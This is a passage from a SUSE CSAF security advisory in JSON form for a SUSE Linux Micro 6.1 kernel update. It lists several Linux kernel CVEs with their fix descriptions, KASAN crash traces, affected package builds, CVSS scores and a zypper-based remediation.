-SSBS BTYPE=--)\n[ 2479.385724]I[0:launcher-loader: 1719] pc : __stack_depot_save+0x464/0x46c\n[ 2479.385751]I[0:launcher-loader: 1719] lr : __stack_depot_save+0x460/0x46c\n[ 2479.385774]I[0:launcher-loader: 1719] sp : ffffffc0080073c0\n[ 2479.385793]I[0:launcher-loader: 1719] x29: ffffffc0080073e0 x28: ffffffd00b78a000 x27: 0000000000000000\n[ 2479.385839]I[0:launcher-loader: 1719] x26: 000000000004d1dd x25: ffffff891474f000 x24: 00000000ca64d1dd\n[ 2479.385882]I[0:launcher-loader: 1719] x23: 0000000000000200 x22: 0000000000000220 x21: 0000000000000040\n[ 2479.385925]I[0:launcher-loader: 1719] x20: ffffffc008007440 x19: 0000000000000000 x18: 0000000000000000\n[ 2479.385969]I[0:launcher-loader: 1719] x17: 2065726568207475 x16: 000000000000005e x15: 2d2d2d2d2d2d2d20\n[ 2479.386013]I[0:launcher-loader: 1719] x14: 5d39313731203a72 x13: 00000000002f6b30 x12: 00000000002f6af8\n[ 2479.386057]I[0:launcher-loader: 1719] x11: 00000000ffffffff x10: ffffffb90aacf000 x9 : e8a74a6c16008800\n[ 2479.386101]I[0:launcher-loader: 1719] x8 : e8a74a6c16008800 x7 : 00000000002f6b30 x6 : 00000000002f6af8\n[ 2479.386145]I[0:launcher-loader: 1719] x5 : ffffffc0080070c8 x4 : ffffffd00b192380 x3 : ffffffd0092b313c\n[ 2479.386189]I[0:launcher-loader: 1719] x2 : 0000000000000001 x1 : 0000000000000004 x0 : 0000000000000022\n[ 2479.386231]I[0:launcher-loader: 1719] Call trace:\n[ 2479.386248]I[0:launcher-loader: 1719] __stack_depot_save+0x464/0x46c\n[ 2479.386273]I[0:launcher-loader: 1719] kasan_save_stack+0x58/0x70\n[ 2479.386303]I[0:launcher-loader: 1719] save_stack_info+0x34/0x138\n[ 2479.386331]I[0:launcher-loader: 1719] kasan_save_free_info+0x18/0x24\n[ 2479.386358]I[0:launcher-loader: 1719] ____kasan_slab_free+0x16c/0x170\n[ 2479.386385]I[0:launcher-loader: 1719] __kasan_slab_free+0x10/0x20\n[ 2479.386410]I[0:launcher-loader: 1719] kmem_cache_free+0x238/0x53c\n[ 2479.386435]I[0:launcher-loader: 1719] mempool_free_slab+0x1c/0x28\n[ 2479.386460]I[0:launcher-loader: 1719] mempool_free+0x7c/0x1a0\n[ 2479.386484]I[0:launcher-loader: 1719] bvec_free+0x34/0x80\n[ 2479.386514]I[0:launcher-loader: 1719] bio_free+0x60/0x98\n[ 2479.386540]I[0:launcher-loader: 1719] bio_put+0x50/0x21c\n[ 2479.386567]I[0:launcher-loader: 1719] f2fs_write_end_io+0x4ac/0x4d0\n[ 2479.386594]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300\n[ 2479.386622]I[0:launcher-loader: 1719] __dm_io_complete+0x324/0x37c\n[ 2479.386650]I[0:launcher-loader: 1719] dm_io_dec_pending+0x60/0xa4\n[ 2479.386676]I[0:launcher-loader: 1719] clone_endio+0xf8/0x2f0\n[ 2479.386700]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300\n[ 2479.386727]I[0:launcher-loader: 1719] blk_update_request+0x258/0x63c\n[ 2479.386754]I[0:launcher-loader: 1719] scsi_end_request+0x50/0x304\n[ 2479.386782]I[0:launcher-loader: 1719] scsi_io_completion+0x88/0x160\n[ 2479.386808]I[0:launcher-loader: 1719] scsi_finish_command+0x17c/0x194\n[ 2479.386833]I\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54322",
"url": "https://www.suse.com/security/cve/CVE-2023-54322"
},
{
"category": "external",
"summary": "SUSE Bug 1255763 for CVE-2023-54322",
"url": "https://bugzilla.suse.com/1255763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54322"
},
{
"cve": "CVE-2023-54324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54324"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix a race condition in retrieve_deps\n\nThere\u0027s a race condition in the multipath target when retrieve_deps\nraces with multipath_message calling dm_get_device and dm_put_device.\nretrieve_deps walks the list of open devices without holding any lock\nbut multipath may add or remove devices to the list while it is\nrunning. The end result may be memory corruption or use-after-free\nmemory access.\n\nSee this description of a UAF with multipath_message():\nhttps://listman.redhat.com/archives/dm-devel/2022-October/052373.html\n\nFix this bug by introducing a new rw semaphore \"devices_lock\". We grab\ndevices_lock for read in retrieve_deps and we grab it for write in\ndm_get_device and dm_put_device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54324",
"url": "https://www.suse.com/security/cve/CVE-2023-54324"
},
{
"category": "external",
"summary": "SUSE Bug 1255759 for CVE-2023-54324",
"url": "https://bugzilla.suse.com/1255759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54324"
},
{
"cve": "CVE-2023-54326",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54326"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: pci_endpoint_test: Free IRQs before removing the device\n\nIn pci_endpoint_test_remove(), freeing the IRQs after removing the device\ncreates a small race window for IRQs to be received with the test device\nmemory already released, causing the IRQ handler to access invalid memory,\nresulting in an oops.\n\nFree the device IRQs before removing the device to avoid this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54326",
"url": "https://www.suse.com/security/cve/CVE-2023-54326"
},
{
"category": "external",
"summary": "SUSE Bug 1255758 for CVE-2023-54326",
"url": "https://bugzilla.suse.com/1255758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54326"
},
{
"cve": "CVE-2024-26944",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26944"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: fix use-after-free in do_zone_finish()\n\nShinichiro reported the following use-after-free triggered by the device\nreplace operation in fstests btrfs/070.\n\n BTRFS info (device nullb1): scrub: finished on devid 1 with status: 0\n ==================================================================\n BUG: KASAN: slab-use-after-free in do_zone_finish+0x91a/0xb90 [btrfs]\n Read of size 8 at addr ffff8881543c8060 by task btrfs-cleaner/3494007\n\n CPU: 0 PID: 3494007 Comm: btrfs-cleaner Tainted: G W 6.8.0-rc5-kts #1\n Hardware name: Supermicro Super Server/X11SPi-TF, BIOS 3.3 02/21/2020\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x5b/0x90\n print_report+0xcf/0x670\n ? __virt_addr_valid+0x200/0x3e0\n kasan_report+0xd8/0x110\n ? do_zone_finish+0x91a/0xb90 [btrfs]\n ? do_zone_finish+0x91a/0xb90 [btrfs]\n do_zone_finish+0x91a/0xb90 [btrfs]\n btrfs_delete_unused_bgs+0x5e1/0x1750 [btrfs]\n ? __pfx_btrfs_delete_unused_bgs+0x10/0x10 [btrfs]\n ? btrfs_put_root+0x2d/0x220 [btrfs]\n ? btrfs_clean_one_deleted_snapshot+0x299/0x430 [btrfs]\n cleaner_kthread+0x21e/0x380 [btrfs]\n ? __pfx_cleaner_kthread+0x10/0x10 [btrfs]\n kthread+0x2e3/0x3c0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x31/0x70\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\n Allocated by task 3493983:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0xaa/0xb0\n btrfs_alloc_device+0xb3/0x4e0 [btrfs]\n device_list_add.constprop.0+0x993/0x1630 [btrfs]\n btrfs_scan_one_device+0x219/0x3d0 [btrfs]\n btrfs_control_ioctl+0x26e/0x310 [btrfs]\n __x64_sys_ioctl+0x134/0x1b0\n do_syscall_64+0x99/0x190\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n Freed by task 3494056:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3f/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x32/0x70\n kfree+0x11b/0x320\n btrfs_rm_dev_replace_free_srcdev+0xca/0x280 [btrfs]\n btrfs_dev_replace_finishing+0xd7e/0x14f0 [btrfs]\n btrfs_dev_replace_by_ioctl+0x1286/0x25a0 [btrfs]\n btrfs_ioctl+0xb27/0x57d0 [btrfs]\n __x64_sys_ioctl+0x134/0x1b0\n do_syscall_64+0x99/0x190\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n The buggy address belongs to the object at ffff8881543c8000\n which belongs to the cache kmalloc-1k of size 1024\n The buggy address is located 96 bytes inside of\n freed 1024-byte region [ffff8881543c8000, ffff8881543c8400)\n\n The buggy address belongs to the physical page:\n page:00000000fe2c1285 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1543c8\n head:00000000fe2c1285 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0\n flags: 0x17ffffc0000840(slab|head|node=0|zone=2|lastcpupid=0x1fffff)\n page_type: 0xffffffff()\n raw: 0017ffffc0000840 ffff888100042dc0 ffffea0019e8f200 dead000000000002\n raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff8881543c7f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n ffff8881543c7f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n \u003effff8881543c8000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ^\n ffff8881543c8080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ffff8881543c8100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n\nThis UAF happens because we\u0027re accessing stale zone information of a\nalready removed btrfs_device in do_zone_finish().\n\nThe sequence of events is as follows:\n\nbtrfs_dev_replace_start\n btrfs_scrub_dev\n btrfs_dev_replace_finishing\n btrfs_dev_replace_update_device_in_mapping_tree \u003c-- devices replaced\n btrfs_rm_dev_replace_free_srcdev\n btrfs_free_device \u003c-- device freed\n\ncleaner_kthread\n btrfs_delete_unused_bgs\n btrfs_zone_finish\n do_zone_finish \u003c-- refers the freed device\n\nThe reason for this is that we\u0027re using a\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26944",
"url": "https://www.suse.com/security/cve/CVE-2024-26944"
},
{
"category": "external",
"summary": "SUSE Bug 1223731 for CVE-2024-26944",
"url": "https://bugzilla.suse.com/1223731"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2024-26944"
},
{
"cve": "CVE-2024-27005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-27005"
}
],
"notes": [
{
"category": "general",
